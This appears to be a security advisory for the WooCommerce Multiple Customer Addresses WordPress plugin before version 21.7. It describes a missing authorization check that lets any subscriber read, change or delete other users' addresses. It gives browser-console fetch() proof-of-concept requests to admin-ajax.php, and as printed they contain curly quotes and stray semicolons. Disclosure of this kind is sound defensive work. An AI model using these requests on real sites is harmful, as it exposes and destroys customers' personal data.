The plugin does not ensure that the address to add/update/retrieve/delete and duplicate belong to the user making the request, or is from a high privilege users, allowing any authenticated users, such as subscriber to add/update/duplicate/delete as well as retrieve addresses of other users.
Run the below commands in the developer console of the web browser while being on the blog as subscriber user (note: the address manipulated are those added via the plugin, not WC) To retrieve the first address of the user with ID 1750 fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=wcmca_get_address_by_id&address;_id=0&user;_id=1750’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Other possible values for address_id: last_used_billing, last_used_shipping, checkout_data. To delete the address with ID 1 of the user with ID 1750 (to be executed on the Edit Address page when logged as a subscriber, e.g http://example.com/my-account/edit-address/) fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=wcmca_delete_address&wcmca;_delete_id=0&wcmca;_user_id=1&wcmca;_security_token=’ + wcmca_address_form[‘security_token’], “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); It is also possible to add/update an address of an arbitrary user via the wcmca_save_new_address AJAX action.
CPE | Name | Operator | Version |
---|---|---|---|
woocommerce-multiple-customer-addresses | lt | 21.7 |